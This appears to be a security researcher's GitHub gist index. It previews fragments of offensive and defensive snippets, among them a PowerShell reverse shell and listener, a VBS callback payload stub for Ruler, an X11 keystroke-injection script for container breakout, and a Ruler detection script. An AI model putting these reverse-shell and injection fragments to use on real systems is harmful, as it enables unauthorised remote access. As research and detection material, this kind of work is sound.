Skip to content

Instantly share code, notes, and snippets.

staaldraad / docker-compose.yml
Created Jun 12, 2017
A docker-compose yml to use with Doorman and osquery
View docker-compose.yml
version: '2'
image: doorman
container_name: "doorman"
context: ./doorman
dockerfile: Dockerfile_doorman
staaldraad / onDC.ps1
Created May 30, 2017
Detect Possible Ruler usage On Exchange and Domain Controller
View onDC.ps1
Get-EventLog -InstanceId 4776 -LogName "Security" | ForEach-Object {
$sp = $_.message -split "`n"
$tmp = $sp | Select-String -Pattern 'RULER'
if($tmp.count -ge 1){
Write-Host "Possible Ruler usage at: " $_.TimeGenerated
$sp | Select-String -Pattern 'Logon Account:' | write-host
staaldraad / Command.vbs
Last active Aug 3, 2022
Using VBSMeter with Ruler
View Command.vbs
Call X()
End Function
Dim RHOST: RHOST = "x.x.x.x"
Dim RPORT: RPORT = "8999"
Function Base64ToStream(b)
Dim enc, length, ba, transform, ms
Set enc = CreateObject("System.Text.ASCIIEncoding")
length = enc.GetByteCount_2(b)
staaldraad / ioctlfilter.c
Created Mar 21, 2017
Filters keycodes from R400 presenter in Linux
View ioctlfilter.c
/* Grabs all input from Logitech R400 presenter and filters to ensure only certain keys are pressed.
* Ensures that only valid R400 keys are pressed and not rogue keys injected.
* Main logic for this found here:
* Author: Etienne Stalmans <>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
staaldraad / webdavserv.go
Last active Sep 15, 2022
A small webdav server in go
View webdavserv.go
package main
import (
staaldraad / receivefile.ps1
Created Feb 24, 2017
Small powershell script to bind to port, accept connection and stream to file. useful for ```cat blah.exe | nc 8080```
View receivefile.ps1
$socket = new-object System.Net.Sockets.TcpListener('', 1080);
if($socket -eq $null){
exit 1;
$client = $socket.AcceptTcpClient();
$stream = $client.GetStream();
$buffer = new-object System.Byte[] 2048;
$file = 'c:/afile.exe';
$fileStream = New-Object System.IO.FileStream($file, [System.IO.FileMode]'Create', [System.IO.FileAccess]'Write');
staaldraad / count words and sort
Created Dec 9, 2016
Count all words in a list and sort
View count words and sort
grep -v "^\s*$" /tmp/cracked| sort | uniq -c | sort -bnr
staaldraad / mini-reverse.ps1
Created Oct 3, 2016
A reverse shell in Powershell
View mini-reverse.ps1
$socket = new-object System.Net.Sockets.TcpClient('', 413);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
$read = $null;
staaldraad / mini-reverse-listener.ps1
Created Oct 3, 2016
A reverse shell listener in powershell
View mini-reverse-listener.ps1
$socket = new-object System.Net.Sockets.TcpListener('', 413);
if($socket -eq $null){
exit 1
$client = $socket.AcceptTcpClient()
write-output "[*] Connection!"
staaldraad /
Last active Aug 28, 2022
Python script to do keystrokes via X11 abstract socket. Useful for silly docker breakout.
Python script to connect to an abstract unix socket created by X11 and send arbitrary key-strokes.
Created by:
Credits to:
Borrowed heavily from the original metasploit module. Thanks!
from socket import *
import subprocess